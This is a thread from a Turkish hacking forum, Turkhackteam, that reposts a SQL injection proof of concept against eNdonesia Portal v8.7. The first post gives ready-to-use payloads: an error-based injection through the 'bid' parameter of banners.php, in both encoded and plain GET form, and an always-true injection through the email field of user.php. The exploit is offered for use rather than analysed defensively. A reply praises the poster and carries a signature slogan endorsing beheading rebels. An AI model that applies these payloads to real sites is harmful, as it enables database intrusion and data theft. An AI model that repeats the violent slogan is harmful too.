Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...




eNdonesia Portal 'banners.php' SQL Inj.

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 4 Hafta önce   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
Sivas / 58
Yaş
30
Mesajlar
Konular

Teşekkür (Etti): 162
Teşekkür (Aldı): 63


eNdonesia Portal 'banners.php' SQL Inj.



# Exploit Basligi / Exploit Title: eNdonesia Portal 'banners.php' SQL Inj.
# Tarih / Date: 19-03-2019
# Exploit Yazar / Exploit Author: Mehmet EMIROGLU
# Yapimci Adresi / Vendor Homepage: Endonesia 8.7 - The Open Source Portal Software
# Yazilim Adresi / Software Link: https://sourceforge.net/projects/endonesia/
# Versiyon / Version: v8.7
# Kategori / Category: Webapps
# Test Edilen Sistem / Tested on: Wamp64, Windows
# CVE: N/A
# Yazilim Aciklamasi / Software Description: eNdonesia bir icerik yönetimi, portal yönetimi, haber yazilimi kisaca coklu kullanim icin uygundur.


Exploit:

Kod:
# POC - SQLi
# Parameters : bid, banners.php
# Saldiri Türü :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/banners.php?op=click&bid=-1 or
1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Kod:
# POC - SQLi
# Parameters : email, user.php
# Saldiri Türü : 1'+OR+1=1+OR+'cw'='cw
# POST Method : http://localhost/endonesia87/user.php
Exploit Adresi:
https://packetstormsecurity.com/file...Injection.html



___________________________________________

“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”
 Offline  
 
Alıntı ile Cevapla
Alt 4 Hafta önce   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2006
Nereden
Siber Alem
Yaş
32
Mesajlar
Konular

Teşekkür (Etti): 5
Teşekkür (Aldı): 65




Hocam güncel açıkları iyi takip ediyorsunuz



___________________________________________

Ya Devlet Başa,Ya Kuzgun Leşe
Hak Arayan Varsa Hakkını Verin, Baş Kaldıran Varsa Başını Kesin
II.Abdulhamid Han


Konu Qwx tarafından ( 4 Hafta önce Saat 09:47 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Kacamax Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau